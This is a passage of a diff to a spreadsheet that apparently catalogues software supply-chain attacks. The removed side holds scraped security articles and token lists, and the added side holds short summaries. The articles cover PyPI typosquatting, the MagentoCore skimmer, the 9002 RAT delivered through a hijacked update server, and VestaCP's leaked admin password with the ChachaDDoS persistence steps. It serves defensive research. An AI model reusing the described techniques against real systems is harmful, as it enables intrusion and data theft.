'analysis', 'result', 'wildfire', 'file', 'file', 'app', 'google', 'second', 'file', 'file', 'sample', 'file', 'infected', 'bundle', 'number', 'malicious', 'file', 'developer', 'machine', 'various', 'malware', 'family', 'malicious', 'file', 'file', 'android', 'app', 'malicious', 'activity', 'file', 'window', 'system', 'logger', 'attempt', 'keystroke', 'sensitive', 'information', 'credit', 'card', 'number', 'social', 'number', 'password', 'fake', 'name', 'appearance', 'legitimate', 'name', 'musicexe', 'imagesexe', 'msnexe', 'wildfire', 'analysis', 'malicious', 'file', 'suspicious', 'activity', 'window', 'system', 'executable', 'file', 'window', 'system', 'folder', 'change', 'window', 'registry', 'autostart', 'attempt', 'long', 'period', 'suspicious', 'network', 'connection', 'activity', 'port', 'potential', 'damage', 'mitigation', 'malicious', 'file', 'host', 'unpacked', 'window', 'machine', 'file', 'developer', 'software', 'developer', 'malicious', 'file', 'runnable', 'android', 'platform', 'situation', 'bad', 'customer', 'network', 'wildfire', 'trap', 'wildfire', 'able', 'infected', 'app', 'trap', 'device', 'malicious', 'app', 'device', 'wildfire', 'device', 'malicious', 'app', 'user', 'development', 'environment', 'critical', 'part', 'software', 'development', 'life', 'cycle', 'countermeasure', 'vain', 'acknowledgement', 'network', 'assistance', 'analysis', 'appendix', 'file', 'infected', 'app', '9af18bd1bc68e0f49f8935a8cf662729cc1cec773f0237188762cebe75d48521', '493d95c5222a86d581110d7c38b62a4e2015bf782ddac04c5a7e576a0955a727', '7268ea040b7ca1ab79d3f1eac279cf4cbc072c706b70672eba8d84387f76b3bf', '688d39cfa1f581e841a896963b83081960844cdf06d3c71e7eab2746e498d5b1', 'df74876a564d38bf8fd3275fd0a429ee74c3f67b2e78f59d97c2ec8a7143bd9a', 'infected', 'file', 'name', 'package', 'name', 'baby', 'room', 'motor', 'trail', 'name', 'b828b870a317693a0ae0544b9d0ffddcf6442da4d1979f6f8ccafcbe5c96d1e3', 'japanese', 'garden', 'comtamanjapangodieapps', 'fish', 'design', 'comdesainrokkodieapps', 'yoga', 'meditation', 'shoe', 'rack', 'comraksepatuodieapp', 'unique', 'tshirt', 'men', 'shoe', 'comtvruangtamuodieapps', 'idea', 'glass', 'comideakacamataodieapps', 'a21f4e9536dcbcd810fbfcdff8f6cce5b6338f1d5df7ba45abd1a5f4ed8dca76', 'fashion', 'bracelet', 'clothing', 'drawing', 'combusanamenggambarodieapps', 'minimalist', 'kitchen', 'cream', 'stick', 'roof', 'child', 'clothe', 'home', 'ceiling', 'living', 'room', 'baby', 'comrajutanbayiodieapps', 'hair', 'paint', 'wall', 'decoration', 'bodybuilder', 'combinaragawanodieapps', 'couple', 'shirt', 'unique', 'paper', 'flower', 'combungakertasodieapps', 'night', 'gown', 'dining', 'table', 'gymnastic', 'comlatihansenamodieapps', 'child', 'compakaiananakodieapps', 'window', 'design', 'hijab', 'wing', 'fencing', 'technique', 'network', 'sign', 'late', 'news', 'cyber', 'intelligence', 'research', 'email', 'address', 'mark', 'robot', 'form', 'term', 'privacy', 'statement', 'popular', 'resource', 'resource', 'center', 'blog', 'community', 'unit', 'sitemap', 'legal', 'notice', 'privacy', 'term', 'document', 'account', 'manage', 'subscription', 'report', 'vulnerability', 'network', 'right']</t>
         </is>
       </c>
     </row>
@@ -2458,15 +2149,14 @@
           <t>Mozilla Add-Ons</t>
         </is>
       </c>
-      <c r="C78" t="inlineStr"/>
+      <c r="C78" t="inlineStr">
+        <is>
+          <t>Mozilla removes 23 malicious extensions caught spying (including Web Security)</t>
+        </is>
+      </c>
       <c r="D78" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/mozilla-removes-23-firefox-add-ons-that-snooped-on-users</t>
-        </is>
-      </c>
-      <c r="E78" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2481,15 +2171,14 @@
           <t>South Korean remote support solutions provider</t>
         </is>
       </c>
-      <c r="C79" t="inlineStr"/>
+      <c r="C79" t="inlineStr">
+        <is>
+          <t>The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company certificate then using it to sign the malware. They also configured the update server to only deliver malicious files if the client is located in the range of IP addresses of their target organizations.</t>
+        </is>
+      </c>
       <c r="D79" t="inlineStr">
         <is>
           <t>https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/</t>
-        </is>
-      </c>
-      <c r="E79" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2506,17 +2195,12 @@
       </c>
       <c r="C80" t="inlineStr">
         <is>
-          <t>skip main content share price globalenglish cancel main menu insights main menu solutions main menu sustainability main menu company main menu investors main menu careers share price globalenglish welcome schneider electric corporate website english french stay global site select location accessibility mode accessibility mode careers company purpose company profile newsroom investors financials results annual reports share price investor events insights sustainability electricity nextgeneration automation sustainability reports foundation consulting solutions software blog monthly updates schneider electric delivered right inbox email please enter valid email address contractor architect interior designer specifying consultant engineer ecommerce pureplayer electrical distributor distributor retailer electrician engineering procurement construction channel partner machine builder panel builder software service provider solar installer building system integrator industrial system integrator power system integrator small medium business user large corporation user home builder developer home owner consumer student seeker please check problem captcha verification please check connection subscribe like receive news commercial info schneider electric affiliates electronic communication means email agree collection information opening clicks emails using invisible pixels images measure performance communications improve details please read privacy policy global opens window legal information privacy policy cookie notice change cookie settings opens window ©2024 schneider electric thank subscribing first know updates schneider electric receive welcome message soon enjoy</t>
+          <t>Schneider Electric battery monitor USB infected with malware (2 SKUs)</t>
         </is>
       </c>
       <c r="D80" t="inlineStr">
         <is>
           <t>https://www.se.com/ww/en/download/document/SESN-2018-236-01</t>
-        </is>
-      </c>
-      <c r="E80" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'share', 'price', 'globalenglish', 'main', 'menu', 'main', 'menu', 'solution', 'main', 'menu', 'sustainability', 'main', 'menu', 'company', 'main', 'menu', 'investor', 'main', 'menu', 'career', 'price', 'globalenglish', 'welcome', 'schneider', 'electric', 'corporate', 'website', 'global', 'site', 'select', 'location', 'accessibility', 'mode', 'accessibility', 'mode', 'career', 'company', 'purpose', 'company', 'newsroom', 'investor', 'financial', 'annual', 'report', 'share', 'price', 'investor', 'event', 'insight', 'sustainability', 'electricity', 'nextgeneration', 'automation', 'sustainability', 'foundation', 'consulting', 'solution', 'software', 'blog', 'monthly', 'update', 'schneider', 'electric', 'right', 'inbox', 'email', 'valid', 'email', 'address', 'contractor', 'architect', 'interior', 'designer', 'consultant', 'engineer', 'ecommerce', 'pureplayer', 'electrical', 'distributor', 'distributor', 'retailer', 'engineering', 'procurement', 'construction', 'channel', 'partner', 'machine', 'builder', 'panel', 'builder', 'software', 'service', 'provider', 'solar', 'installer', 'building', 'system', 'industrial', 'system', 'integrator', 'power', 'system', 'small', 'medium', 'business', 'user', 'large', 'user', 'home', 'builder', 'developer', 'home', 'owner', 'consumer', 'student', 'seeker', 'problem', 'captcha', 'verification', 'connection', 'subscribe', 'news', 'commercial', 'info', 'schneider', 'electric', 'affiliate', 'electronic', 'communication', 'email', 'collection', 'information', 'click', 'email', 'invisible', 'pixel', 'image', 'measure', 'performance', 'communication', 'detail', 'privacy', 'policy', 'global', 'window', 'legal', 'information', 'privacy', 'policy', 'cookie', 'notice', 'cookie', 'setting', 'window', '©', 'know', 'update', 'schneider', 'electric', 'welcome', 'message']</t>
         </is>
       </c>
     </row>
@@ -2531,15 +2215,14 @@
           <t>Packagist</t>
         </is>
       </c>
-      <c r="C81" t="inlineStr"/>
+      <c r="C81" t="inlineStr">
+        <is>
+          <t>Packagist, PHP's Largest Package Repository vulnerable to RCE</t>
+        </is>
+      </c>
       <c r="D81" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/critical-flaw-fixed-in-packagist-phps-largest-package-repository</t>
-        </is>
-      </c>
-      <c r="E81" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2554,15 +2237,14 @@
           <t>Web hosting site</t>
         </is>
       </c>
-      <c r="C82" t="inlineStr"/>
+      <c r="C82" t="inlineStr">
+        <is>
+          <t>MagentoCore card skimming malware added to 7339 Magento online stores</t>
+        </is>
+      </c>
       <c r="D82" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores</t>
-        </is>
-      </c>
-      <c r="E82" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2579,17 +2261,12 @@
       </c>
       <c r="C83" t="inlineStr">
         <is>
-          <t>skip content search search malwarebytescom search contact personal support business support quote contact press partner programs submit vulnerability company malwarebytes careers news press sign myaccount sign manage personal teams subscription cloud console sign manage cloud business products partner portal sign management resellers msps personal personal products malwarebytes premium malwarebytes privacy malwarebytes identity theft protection malwarebytes browser guard malwarebytes teamssmall offices adwcleaner windows find right product plans infected already clean device solutions free antivirus free virus scan removal windows antivirus antivirus android antivirus chromebook antivirus digital footprint scan personal pricing manage subscription visit support page business business bundles threatdown bundles protect endpoints powerfully simple costeffective bundles education bundles secure students institution cyberattacks technology highlights managed detection response deploy fullymanaged monitoring investigation remediation endpoint detection response prevent attacks catches others miss explore portfolio visualize optimize posture minutes learn advisor available every bundle pricing pricing personal pricing protect personal devices data small officehome office pricing protect team’s devices data business pricing employees step corporate endpoint save partners partners explore partnerships partner solutions resellers managed service providers computer repair technology partners affiliate partners contact resources resources learn cybersecurity antivirus malware ransomware malwarebytes labs blog glossary center business resources reviews analyst reports case studies press news reports state malware report read report support support technical support personal support business support premium services forums vulnerability disclosure report false positive featured content activate malwarebytes privacy windows device content product videos free download search search search malwarebytescom search subscribe apple news threats store apps stealing user data posted september thomas reed concerning trend lately store several researchers independently found different apps collecting sensitive user data uploading servers controlled developer referred exfiltrating data data actually sent chinese servers subject stringent requirements around storage protection personally identifiable information like organizations based adware doctor patrick wardle recently posted article detailing misbehavior named adware doctor exfiltrating following data safari history chrome history firefox history list running processes list software downloaded data store apps accessing much less exfiltrating case list running processes work around blockages apple place prevent apps accessing data developers found loophole allowed access data despite apple’s restrictions developer malwarebytes since time discovered store named adware medic—a direct ripoff highlysuccessful name became malwarebytes immediately began detecting contacted apple removing eventually removed replaced soon identical named adware doctor we’ve continued fight well others made developer taken several times continued failure apple’s review process always replaced version long open files support came onto radar late last year we’ve seen number different scam applications like hijack system’s functionality handling documents user appropriate open means advertising products…most often scams typical behavior user opens unfamiliar file others like opens promotes antivirus software scanning file computer often telling user might unable open file infected interestingly software designed promote appeared mainstream antivirus product seemed like abuse affiliate program product turned app’s behavior similar current behavior adware doctor uploading file named filezip following updateappletunertrendmicrocom1uploadsearchkeywords file contained following data complete safari browsing search history complete chrome browsing search history complete firefox browsing search history complete store browsing history reported apple december still present store investigating found open files promoting antivirus store investigate antivirus well number apps recently open files stopped exfiltrating data retained evidence observations antivirus investigating learned like store apps limited detect begin restrictions imposed store however even within user folder antivirus apps store don’t good detection rate exception worse however observed pattern data exfiltration seen open files data collected also uploaded file named filezip used open files file though contained interesting bonus addition browsing history also contained interesting file named appplist contained detailed information every application found system short excerpt file showing information listed antivirus could argued useful antivirus software collect certain limited browsing history leading malwarewebpage detection blocking hard argue exfiltrate entire browsing history installed browsers regardless whether user encountered malware addition nothing inform user data collection data collection cleaner unfortunately apps developer also collecting data observed data collected cleaner minus list installed applications really good reason “cleaning” collecting kind user data even users informed case interestingly found drcleanerdotcom website used promote apps whois records identified individual living china foxmailcom email address registered owner domain mean it’s blindingly obvious point store safe reputable software apple wants i’ve saying several years we’ve detecting junk software store almost long i’ve malwarebytes information issues reveal depth problem people unaware we’ve reported software like apple years variety channels rarely immediate effect cases we’ve seen offending apps removed quickly although sometimes apps come back quickly case adware doctor cases taken long months reported removed many cases apps reported still store case point…all strongly encourage treat store like would download location potentially dangerous cautious download free store seem perfectly innocent harmless give access data part expected functionality can’t know data worse even don’t give access find loophole access sensitive data anyway download apps regretting report apple httpsreportaproblemapplecom special thanks thanks folks spent spare time finding poking applications last year peternopsled malwarebytes forums privacyis1st patrick wardle share article related articles news disturbing robocaller fined million march robocaller spoofed local phone number presented targets inflammatory disturbing content received hefty fine continue reading comments news meta abandon social media tracking tool crowdtangle march meta retire social media tracking tool crowdtangle august awkward timing given amount important elections year continue reading comments exploits vulnerabilities news patch mozilla patches critical vulnerabilities firefox march mozilla released update firefox critical vulnerabilities together allowed attacker escape sandbox continue reading comments news privacy ransomware vans warns customers data breach march vans warns customers phishing fraud attacks aftermath ransomware attack december continue reading comments podcast securing home network long tiresome entirely worth carey parker lock code s05e07 march week lock code podcast speak carey parker importance process securing home network continue reading comments author thomas reed director mobile cool macs selftrained apple expert amateur photographer contributors center podcast glossary scams cyberprotection every personal windows antivirus antivirus android antivirus free antivirus devices malwarebytes company contact careers news press blog scholarship forums business small businesses midsize business larger enterprise endpoint protection endpoint detection response managed detection response partners managed service provider program resellers account sign solutions digital footprint scan rootkit scanner trojan scanner virus scanner spyware scanner password generator anti ransomware protection address albert quay floor cork x8n6 ireland freedom circle 12th floor santa clara learn malware hacking phishing ransomware computer virus antivirus twitter facebook linkedin youtube instagram cybersecurity info can’t live without want stay informed latest news cybersecurity sign newsletter learn protect computer threats email address english legal privacy accessibility compliance certifications vulnerability disclosure terms service rights reserved select language</t>
+          <t>Several security researchers have independently found different apps that are collecting sensitive user data and uploading it to servers controlled by the developer.</t>
         </is>
       </c>
       <c r="D83" t="inlineStr">
         <is>
           <t>https://blog.malwarebytes.com/threat-analysis/2018/09/mac-app-store-apps-are-stealing-user-data/</t>
-        </is>
-      </c>
-      <c r="E83" t="inlineStr">
-        <is>
-          <t>['content', 'search', 'search', 'search', 'contact', 'personal', 'support', 'business', 'support', 'contact', 'press', 'partner', 'program', 'vulnerability', 'company', 'career', 'news', 'press', 'sign', 'myaccount', 'sign', 'personal', 'team', 'subscription', 'sign', 'cloud', 'business', 'product', 'partner', 'portal', 'sign', 'management', 'reseller', 'msp', 'personal', 'personal', 'product', 'identity', 'office', 'adwclean', 'window', 'right', 'product', 'plan', 'clean', 'device', 'solution', 'free', 'footprint', 'personal', 'pricing', 'subscription', 'visit', 'support', 'page', 'business', 'business', 'bundle', 'threatdown', 'bundle', 'endpoint', 'simple', 'costeffective', 'bundle', 'education', 'bundle', 'student', 'institution', 'cyberattack', 'technology', 'highlight', 'detection', 'response', 'fullymanaged', 'monitoring', 'investigation', 'remediation', 'endpoint', 'detection', 'response', 'attack', 'other', 'portfolio', 'optimize', 'posture', 'minute', 'advisor', 'available', 'bundle', 'pricing', 'pricing', 'personal', 'pricing', 'personal', 'device', 'data', 'small', 'officehome', 'office', 'pricing', 'protect', 'team', 'device', 'data', 'business', 'pricing', 'employee', 'corporate', 'endpoint', 'partner', 'partner', 'partnership', 'partner', 'solution', 'reseller', 'service', 'provider', 'computer', 'repair', 'technology', 'partner', 'affiliate', 'partner', 'contact', 'resource', 'resource', 'cybersecurity', 'center', 'business', 'resource', 'review', 'analyst', 'case', 'study', 'news', 'report', 'support', 'support', 'technical', 'support', 'personal', 'support', 'business', 'support', 'premium', 'service', 'forum', 'vulnerability', 'disclosure', 'report', 'false', 'positive', 'content', 'malwarebyte', 'device', 'content', 'product', 'video', 'free', 'download', 'search', 'search', 'search', 'search', 'subscribe', 'apple', 'news', 'threat', 'store', 'app', 'user', 'datum', 'trend', 'several', 'researcher', 'different', 'app', 'sensitive', 'user', 'datum', 'uploading', 'server', 'developer', 'datum', 'datum', 'chinese', 'server', 'subject', 'stringent', 'requirement', 'storage', 'protection', 'identifiable', 'information', 'organization', 'adware', 'doctor', 'article', 'misbehavior', 'adware', 'doctor', 'exfiltrating', 'datum', 'safari', 'history', 'chrome', 'history', 'firefox', 'history', 'list', 'running', 'process', 'list', 'software', 'datum', 'store', 'app', 'case', 'list', 'running', 'process', 'app', 'datum', 'developer', 'loophole', 'access', 'datum', 'apple', 'restriction', 'developer', 'malwarebyte', 'time', 'store', 'adware', 'medic', 'direct', 'ripoff', 'highlysuccessful', 'name', 'malwarebyte', 'contacted', 'apple', 'identical', 'adware', 'doctor', 'other', 'developer', 'several', 'time', 'continued', 'failure', 'apple', 'review', 'process', 'version', 'long', 'open', 'file', 'support', 'radar', 'last', 'year', 'number', 'different', 'scam', 'application', 'hijack', 'system', 'functionality', 'document', 'user', 'appropriate', 'open', 'advertising', 'product', 'typical', 'behavior', 'user', 'unfamiliar', 'file', 'other', 'antivirus', 'software', 'file', 'computer', 'user', 'unable', 'open', 'file', 'software', 'promote', 'mainstream', 'antivirus', 'product', 'abuse', 'affiliate', 'program', 'product', 'app', 'behavior', 'similar', 'current', 'behavior', 'adware', 'doctor', 'file', 'filezip', 'file', 'datum', 'safari', 'search', 'history', 'complete', 'chrome', 'search', 'history', 'complete', 'firefox', 'search', 'history', 'complete', 'store', 'history', 'present', 'store', 'investigating', 'open', 'file', 'store', 'antivirus', 'well', 'number', 'app', 'open', 'file', 'datum', 'evidence', 'observation', 'store', 'app', 'restriction', 'store', 'user', 'folder', 'app', 'store', 'good', 'detection', 'rate', 'exception', 'bad', 'pattern', 'datum', 'exfiltration', 'open', 'file', 'datum', 'file', 'filezip', 'open', 'file', 'file', 'interesting', 'bonus', 'addition', 'history', 'interesting', 'file', 'appplist', 'detailed', 'information', 'application', 'system', 'short', 'excerpt', 'file', 'information', 'antivirus', 'useful', 'antivirus', 'software', 'certain', 'limited', 'history', 'malwarewebpage', 'detection', 'hard', 'argue', 'entire', 'history', 'browser', 'user', 'malware', 'addition', 'user', 'datum', 'collection', 'datum', 'collection', 'cleaner', 'app', 'developer', 'datum', 'datum', 'clean', 'list', 'application', 'good', 'reason', 'kind', 'user', 'datum', 'user', 'informed', 'case', 'website', 'app', 'whois', 'record', 'individual', 'address', 'owner', 'domain', 'obvious', 'point', 'store', 'safe', 'reputable', 'software', 'apple', 'several', 'year', 'junk', 'software', 'store', 'malwarebyte', 'information', 'issue', 'depth', 'problem', 'people', 'unaware', 'software', 'apple', 'year', 'variety', 'channel', 'immediate', 'effect', 'case', 'app', 'app', 'case', 'adware', 'doctor', 'case', 'long', 'month', 'many', 'case', 'app', 'store', 'case', 'point', 'treat', 'store', 'location', 'dangerous', 'cautious', 'download', 'free', 'store', 'innocent', 'harmless', 'access', 'datum', 'part', 'functionality', 'datum', 'bad', 'access', 'loophole', 'access', 'sensitive', 'datum', 'download', 'app', 'report', 'thank', 'thank', 'folk', 'spare', 'time', 'poking', 'application', 'last', 'year', 'malwarebyte', 'forum', 'article', 'news', 'robocaller', 'local', 'phone', 'number', 'inflammatory', 'disturbing', 'content', 'hefty', 'fine', 'comment', 'news', 'social', 'medium', 'tracking', 'tool', 'meta', 'retire', 'social', 'medium', 'tracking', 'tool', 'awkward', 'timing', 'amount', 'important', 'election', 'year', 'comment', 'news', 'patch', 'critical', 'vulnerability', 'update', 'critical', 'vulnerability', 'attacker', 'sandbox', 'continue', 'comment', 'news', 'privacy', 'ransomware', 'van', 'customer', 'datum', 'breach', 'van', 'customer', 'fraud', 'attack', 'attack', 'comment', 'podcast', 'home', 'network', 'tiresome', 'worth', 'carey', 'parker', 'lock', 'code', 's05e07', 'week', 'lock', 'code', 'podcast', 'carey', 'parker', 'importance', 'process', 'home', 'network', 'comment', 'author', 'expert', 'amateur', 'photographer', 'contributor', 'center', 'podcast', 'cyberprotection', 'personal', 'window', 'company', 'contact', 'career', 'news', 'press', 'blog', 'scholarship', 'forum', 'small', 'business', 'business', 'large', 'enterprise', 'endpoint', 'protection', 'endpoint', 'detection', 'response', 'detection', 'response', 'partner', 'service', 'provider', 'program', 'reseller', 'sign', 'solution', 'digital', 'footprint', 'rootkit', 'scanner', 'scanner', 'virus', 'scanner', 'spyware', 'scanner', 'generator', 'freedom', 'circle', '12th', 'floor', 'hacking', 'ransomware', 'computer', 'virus', 'cybersecurity', 'info', 'informed', 'late', 'news', 'cybersecurity', 'sign', 'newsletter', 'computer', 'threat', 'email', 'address', 'privacy', 'accessibility', 'compliance', 'certification', 'vulnerability', 'disclosure', 'term', 'service', 'right', 'select', 'language']</t>
         </is>
       </c>
     </row>
@@ -2606,17 +2283,12 @@
       </c>
       <c r="C84" t="inlineStr">
         <is>
-          <t>open sign sign write sign sign detecting cyber attacks python package index pypi bertus follow read listen share malicious packages lurking python package index pypi repository using customwritten automatic scanning tool able identify eleven different malicious packages based content installer scripts many malicious packages typosquatting legitimate package posing real possibilities programmers inadvertently executing malicious code machines future work identify packages pypi background fall looking research project information field would also include aspects software engineering time skcirt slovakia’s national authority published advisory python packages typosquatting popular packages pypi skcirt advisory technica article read report surprised easy pull type attack wondering would easy detecting however dive potentially detect type attack let’s look attack works anatomy attack typosquatting attack proceeds follow attacker creates fake python package name similar existing package attacker adds malicious code setuppy file python packages setuppy file executed package installed attacker uploads package pypi waits victims install victim installs package using “pip install” malicious code setuppy executes addition adding malicious code setuppy also possible malicious code could added functional code package difficult execute since attacker understand code package order malicious code without breaking functionality package attacks pypi involved using setuppy code called setuppy however earlier year package called sshdecorate modified steal credentials part functional code package sshdecorate incident detecting attack python community mostly focused prevention techniques like checking preventing typosquatted packages names package signing good option preventing type attack since verifies identity package author provide information regarding malicious intent author even verified identity author reputation system could possibly added centralized crowdbased signing part mitigate attacks despite prevention efforts actors still manage publish malicious code repository point must detected removed detection efforts primitive based adhoc detectandreport system developer stumbles across code pypi administrators notified package removed research looked automated detection techniques rather prevention automated detection techniques used conjunction existing prevention techniques provide multiple layers defense attacks question mind malicious python package pypi automated tell malicious preferably without installing project author automated detection tool broad approaches authoring automated tool dynamic analysis install package sandbox look indicators malicious code static analysis analyze code without executing check indicators malicious code using dynamic analysis executing install sandbox likely accurate slower also requires careful setup ensure sandbox escapes preference develop tool could within couple seconds provide evaluation potentially malicious code python package decided implement detection tool using static code analysis since dynamic analysis cannot provide required performance certainly ways actor could purposefully avoid patterns used static code analysis would make difficult actors include malicious code setuppy script tool would also provide proforma measurement prevalence malicious code within python repository since code preexists automated detection mechanisms initial detection malicious code provided valuable insight interest actors code typosquatting attacks static code analysis detection strategy main pattern used detecting malicious code python installer code setupypy based looking code attempts establish outbound network connection malicious code attempts exfiltrate data checkin “command control” operations generally require outbound connection assumption many legitimate packages make outbound connections part installation process although python packages occasionally legitimately download additional resources part install process minority detection outbound network connections provides efficient method detect malicious packages albeit false positives dismissed manual inspection implementation detection tool implemented python uses abstract syntax tree library parse python source code main patterns tool looks source code outbound network connections strings executed code obfuscation techniques like base64 encoding results initial scan pypi included approximately packages time detected packages containing malicious code reported privately pypi maintainers earlier year based package names several typosquatted popular django package several others typosquatting python standard libraries half packages could classified typosquatting research experiments packages performs ping back server indicating package installed several packages injected code bashrc file installed linux system however injected code downloaded website seemingly abandonedbroken could determine purpose malware package opened reverse shell proxy service possible determine connection future work work continues improve tool obvious avenues improvement include detection malicious code functional code packages reduction false positives python follow written bertus followers software engineering follow help status careers blog privacy terms text speech teams</t>
+          <t>smplejson was created to mimic the simplejson package in the standard library.  It collects and exfiltrates host information.</t>
         </is>
       </c>
       <c r="D84" t="inlineStr">
         <is>
           <t>https://medium.com/@bertusk/detecting-cyber-attacks-in-the-python-package-index-pypi-61ab2b585c67</t>
-        </is>
-      </c>
-      <c r="E84" t="inlineStr">
-        <is>
-          <t>['open', 'sign', 'sign', 'sign', 'sign', 'cyber', 'python', 'package', 'index', 'listen', 'malicious', 'package', 'python', 'package', 'index', 'pypi', 'customwritten', 'automatic', 'tool', 'able', 'different', 'malicious', 'package', 'content', 'script', 'many', 'malicious', 'package', 'legitimate', 'package', 'real', 'possibility', 'programmer', 'malicious', 'code', 'machine', 'future', 'work', 'package', 'research', 'project', 'information', 'field', 'aspect', 'software', 'engineering', 'time', 'advisory', 'python', 'package', 'popular', 'package', 'article', 'report', 'easy', 'pull', 'type', 'attack', 'type', 'attack', 'attack', 'anatomy', 'attack', 'attack', 'proceed', 'follow', 'attacker', 'fake', 'python', 'package', 'name', 'similar', 'package', 'attacker', 'malicious', 'code', 'setuppy', 'python', 'package', 'setuppy', 'file', 'package', 'attacker', 'package', 'victim', 'victim', 'package', 'malicious', 'code', 'addition', 'malicious', 'code', 'setuppy', 'possible', 'malicious', 'code', 'functional', 'code', 'package', 'difficult', 'execute', 'attacker', 'code', 'package', 'order', 'malicious', 'code', 'functionality', 'package', 'attack', 'setuppy', 'code', 'setuppy', 'early', 'year', 'package', 'sshdecorate', 'steal', 'credential', 'part', 'functional', 'code', 'package', 'sshdecorate', 'incident', 'attack', 'python', 'community', 'prevention', 'technique', 'package', 'name', 'package', 'good', 'option', 'type', 'attack', 'identity', 'package', 'author', 'information', 'malicious', 'intent', 'author', 'identity', 'author', 'reputation', 'system', 'centralized', 'part', 'attack', 'prevention', 'effort', 'actor', 'malicious', 'code', 'repository', 'point', 'removed', 'detection', 'effort', 'primitive', 'detectandreport', 'system', 'developer', 'code', 'administrator', 'package', 'research', 'automated', 'detection', 'technique', 'detection', 'technique', 'conjunction', 'prevention', 'technique', 'multiple', 'layer', 'defense', 'attack', 'mind', 'malicious', 'python', 'package', 'pypi', 'malicious', 'project', 'author', 'detection', 'tool', 'broad', 'approach', 'tool', 'dynamic', 'analysis', 'package', 'sandbox', 'look', 'indicator', 'malicious', 'code', 'static', 'analysis', 'analyze', 'code', 'check', 'indicator', 'malicious', 'code', 'dynamic', 'analysis', 'install', 'accurate', 'slow', 'careful', 'setup', 'preference', 'tool', 'couple', 'second', 'evaluation', 'malicious', 'code', 'python', 'package', 'implement', 'detection', 'tool', 'static', 'code', 'analysis', 'dynamic', 'analysis', 'required', 'performance', 'way', 'actor', 'pattern', 'static', 'code', 'analysis', 'difficult', 'actor', 'malicious', 'code', 'setuppy', 'script', 'tool', 'proforma', 'measurement', 'prevalence', 'malicious', 'code', 'python', 'repository', 'code', 'preexist', 'detection', 'mechanism', 'initial', 'detection', 'malicious', 'code', 'valuable', 'insight', 'interest', 'actor', 'code', 'typosquatting', 'attack', 'static', 'code', 'analysis', 'detection', 'strategy', 'main', 'pattern', 'malicious', 'code', 'python', 'installer', 'code', 'code', 'attempt', 'outbound', 'network', 'connection', 'malicious', 'code', 'attempt', 'datum', 'checkin', 'command', 'control', 'operation', 'outbound', 'connection', 'assumption', 'many', 'legitimate', 'package', 'outbound', 'connection', 'part', 'installation', 'process', 'package', 'additional', 'resource', 'part', 'install', 'process', 'minority', 'detection', 'outbound', 'network', 'connection', 'efficient', 'method', 'malicious', 'package', 'false', 'positive', 'manual', 'inspection', 'implementation', 'detection', 'tool', 'python', 'abstract', 'syntax', 'tree', 'library', 'parse', 'source', 'code', 'main', 'pattern', 'tool', 'source', 'code', 'outbound', 'network', 'connection', 'string', 'code', 'obfuscation', 'technique', 'base64', 'encoding', 'result', 'initial', 'package', 'time', 'package', 'malicious', 'code', 'early', 'year', 'package', 'name', 'several', 'popular', 'django', 'several', 'other', 'python', 'standard', 'library', 'half', 'package', 'research', 'experiment', 'package', 'server', 'package', 'several', 'package', 'code', 'system', 'code', 'website', 'purpose', 'package', 'reverse', 'shell', 'proxy', 'service', 'possible', 'connection', 'future', 'work', 'work', 'tool', 'obvious', 'avenue', 'improvement', 'detection', 'malicious', 'code', 'functional', 'code', 'package', 'false', 'positive', 'python', 'follow', 'software', 'engineering', 'follow', 'help', 'status', 'career', 'blog', 'privacy', 'term', 'text', 'speech', 'team']</t>
         </is>
       </c>
     </row>
@@ -2633,17 +2305,12 @@
       </c>
       <c r="C85" t="inlineStr">
         <is>
-          <t>awardwinning news views insight eset community english español deutsch português français tips advice business eset research eset research blogposts podcasts white papers reports featured ukraine crisis digital resource center live progress covid19 resources videos topics digital scams privacy cybercrime kids online social media internet things malware ransomware secure coding mobile critical infrastructure research welivesecurity experts contact english español deutsch português français awardwinning news views insight eset community malware vestacp compromised supplychain attack customers admin credentials stolen servers infected linuxchachaddos marcetienne mléveillé read recent months numerous users vestacp hosting control panel solution received warnings service providers servers using abnormal amount bandwidth know servers fact used launch ddos attacks analysis compromised server shown malware call linuxchachaddos installed system time week found official vestacp distribution compromised resulting supplychain attack installations vestacp since least linuxchachaddos similarity linuxxorddos xorddos unlike older family multiple stages uses second thirdstage components infection vector according user “razza” vestacp forum attacker tried launching linuxchachaddos clear payload dropped vartmp ectory assuming attacker already admin password would trivial task installation vestacp creates user named “admin” sudo privileges could attacker known password admin user multiple hypotheses credentials obtained first place first suspected vulnerability interface vestacp looking code found unencrypted password kept rootmycnf accessing content file would still require attacker exploit local file inclusion privilege escalation vulnerability user “falzo” also code found something even interesting versions installation script leaking admin password server name vestacpcom official website vestacp “l4ky” pointed hist vstinstallubuntush file utc3 a3f0fa1 ee03eff codename variable contained base64encoded password server domain name sent httpvestacpcomnotify falzo says found hack line debian installer unlike ubuntu installer couldn’t find reference history perhaps installer vestacp differed visible github given major password leak urge vestacp administrators change admin password harden access servers serious admins consider audit vestacp code finding shocking evidence password leakage linuxchachaddos distributed first place could another hole vestacp maintainers stated compromised malicious code ended tree still unclear perhaps perpetrator modified installation scripts server version used create next version file ubuntu target would mean compromised since least linuxchachaddos analysis malware dropped compromised servers variant strain ddos malware call chachaddos seems like evolution multiple existing ddos malware first second stages process kworker11 would appear output first stage persistence mechanism link xorddos persistence mechanism used linuxchachaddos actually linuxxorddos except filename dhcprenew consists following steps copies usrbindhcprenew persistence mechanism related malware already host removed service added etcinitddhcprenew binsh chkconfig description dhcprenew begin init info provides dhcprenew requiredstart requiredstop defaultstart defaultstop shortdescription dhcprenew init info case start usrbindhcprenew stop usrbindhcprenew esac symlink service create etcrc15ds90dhcprenew etcrcdrc15ds90dhcprenew runs command chkconfig dhcprenew updatercd dhcprenew defaults enable service download decryption second stage persistence second stage periodically downloaded hardcoded interestingly 